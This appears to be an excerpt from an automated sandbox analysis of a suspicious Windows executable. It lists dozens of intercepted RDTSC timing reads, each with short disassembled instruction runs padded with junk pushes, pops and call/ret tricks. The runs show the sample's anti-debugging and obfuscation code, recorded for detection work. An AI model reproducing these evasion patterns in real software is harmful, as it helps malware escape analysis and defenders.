                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C74A8 second address: 13C74AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C855E second address: 13C856A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007FAF1CCF5656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C856A second address: 13C8570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CBC64 second address: 13CBC68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CBC68 second address: 13CBC6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CBF56 second address: 13CBF60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CC08D second address: 13CC0B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D50h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FAF1CBF1D4Bh 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CC0B6 second address: 13CC0C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF565Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CC0C5 second address: 13CC0CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CC0CB second address: 13CC0D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CC692 second address: 13CC698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CC698 second address: 13CC6A8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jl 00007FAF1CCF5656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CC6A8 second address: 13CC6AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CD5EA second address: 13CD5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FAF1CCF5658h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CD5F9 second address: 13CD603 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAF1CBF1D4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDBDF second address: 13CDBF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF1CCF5666h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDDF0 second address: 13CDDF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CE271 second address: 13CE277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CE277 second address: 13CE27B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CE3DB second address: 13CE3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CCF5667h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CE5A3 second address: 13CE5A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CEEB6 second address: 13CEF28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 mov dword ptr [esp], eax 0x0000000b sub dword ptr [ebp+122D26FAh], edi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FAF1CCF5658h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d pushad 0x0000002e jmp 00007FAF1CCF5668h 0x00000033 mov edi, 0158D07Ah 0x00000038 popad 0x00000039 push 00000000h 0x0000003b mov edi, ecx 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 push esi 0x00000041 jmp 00007FAF1CCF5665h 0x00000046 pop esi 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CEF28 second address: 13CEF2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CEF2E second address: 13CEF41 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FAF1CCF5656h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CEF41 second address: 13CEF47 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D08B0 second address: 13D08EF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007FAF1CCF5656h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FAF1CCF5658h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 push 00000000h 0x0000002b and si, BD0Ah 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+1245152Ah], ebx 0x00000038 xchg eax, ebx 0x00000039 pushad 0x0000003a push ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D08EF second address: 13D08F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D08F9 second address: 13D0905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D0905 second address: 13D0909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D0909 second address: 13D090D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D1F2A second address: 13D1F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D1C7E second address: 13D1C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D3209 second address: 13D3227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FAF1CBF1D58h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D7559 second address: 13D756D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FAF1CCF5658h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D756D second address: 13D7573 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D46BC second address: 13D46C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D9724 second address: 13D972A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D972A second address: 13D9747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF5661h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D9747 second address: 13D974B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DA659 second address: 13DA663 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DA663 second address: 13DA669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DA669 second address: 13DA66D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D991F second address: 13D9923 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DA82F second address: 13DA839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FAF1CCF5656h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC6B7 second address: 13DC6BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC6BD second address: 13DC6C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD6AE second address: 13DD6B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD6B9 second address: 13DD741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jbe 00007FAF1CCF5681h 0x0000000d pushad 0x0000000e jmp 00007FAF1CCF5660h 0x00000013 jmp 00007FAF1CCF5669h 0x00000018 popad 0x00000019 nop 0x0000001a adc edi, 32196C8Bh 0x00000020 push 00000000h 0x00000022 jmp 00007FAF1CCF5664h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007FAF1CCF5658h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 0000001Dh 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov dword ptr [ebp+122D2FA7h], eax 0x00000049 push eax 0x0000004a push ebx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD741 second address: 13DD745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DE76F second address: 13DE774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DE774 second address: 13DE779 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD89A second address: 13DD8A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DE983 second address: 13DE994 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF1CBF1D4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DE994 second address: 13DE9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 je 00007FAF1CCF5669h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1A18 second address: 13E1A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1A1C second address: 13E1A43 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov di, bx 0x00000011 push 00000000h 0x00000013 adc bl, FFFFFF91h 0x00000016 push 00000000h 0x00000018 mov bx, 6B48h 0x0000001c xchg eax, esi 0x0000001d push ebx 0x0000001e pushad 0x0000001f je 00007FAF1CCF5656h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1A43 second address: 13E1A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E28EE second address: 13E28F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E28F2 second address: 13E2900 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAF1CBF1D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E2900 second address: 13E2904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E38DA second address: 13E38DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4852 second address: 13E486E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF5668h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E486E second address: 13E48E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FAF1CBF1D48h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov bh, 61h 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007FAF1CBF1D48h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 mov bx, E329h 0x0000004a jmp 00007FAF1CBF1D4Eh 0x0000004f xchg eax, esi 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E48E9 second address: 13E48ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E48ED second address: 13E48F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E48F1 second address: 13E48F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E48F7 second address: 13E4919 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4919 second address: 13E491E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E491E second address: 13E4928 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAF1CBF1D4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E0BF0 second address: 13E0C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FAF1CCF5658h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 jmp 00007FAF1CCF5668h 0x0000002c push dword ptr fs:[00000000h] 0x00000033 mov ebx, dword ptr [ebp+122D2BB1h] 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov ebx, dword ptr [ebp+122D2A1Dh] 0x00000046 mov eax, dword ptr [ebp+122D05D9h] 0x0000004c cmc 0x0000004d push FFFFFFFFh 0x0000004f sub bh, 00000011h 0x00000052 push eax 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 push edi 0x00000057 pop edi 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E2A90 second address: 13E2A97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E58B9 second address: 13E58BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E2B56 second address: 13E2B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E58BE second address: 13E58D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF1CCF5662h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E2B5A second address: 13E2B69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E3AA5 second address: 13E3AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E3AA9 second address: 13E3AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E3AAF second address: 13E3AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FAF1CCF5656h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E3AB9 second address: 13E3ACE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007FAF1CBF1D46h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E3ACE second address: 13E3AD3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5B10 second address: 13E5B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF1CBF1D53h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EC767 second address: 13EC76E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EEC09 second address: 13EEC39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAF1CBF1D53h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EEC39 second address: 13EEC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138AA70 second address: 138AA7A instructions: 0x00000000 rdtsc 0x00000002 je 00007FAF1CBF1D4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4344 second address: 13F4364 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF1CCF5662h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4364 second address: 13F4368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4368 second address: 13F436C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4484 second address: 13F449F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FAF1CBF1D53h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F449F second address: 13F44A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7A38 second address: 13E7A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CBF1D50h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7A53 second address: 13E7A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7A57 second address: 13E7A5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F9D00 second address: 13F9D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
